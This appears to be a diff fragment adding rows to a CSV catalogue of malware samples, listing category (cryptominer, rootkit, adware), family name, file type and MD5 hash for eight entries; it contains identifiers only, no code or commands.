+25,Cryptominer,Miner.lemon_duck,ps1,28b80843b13fab0986479b54310c8053 +26,Cryptominer,Trojan.Glupteba.Qwertyminer,Win32 EXE,d668e0990354d0ae209ec520cb80e052 +27,Cryptominer,Miner.Tofsee,Win32 EXE,488bfb786944d1b236ac6254eb97dd69 +28,Rootkit,Rootkit.Lamberts,Win32 EXE,a00918f782ba83aa405614430c65aab6 +29,Adware,Adware.Mindspark,Win32 EXE,aeb471c20095e7d8557478a518d0fc8c +30,Adware,Adware.Sogou,Win32 EXE,775307b867b19872f49aaa9fcc7c6800 +31,Adware,Adware.FusionCore,Win32 EXE,d4ce88978ea01afe4ec930e59f9abf61 +32,Adware,Adware.Unruy,Win32 EXE,3a4c09aba1b399a43a65a27aee9c90e0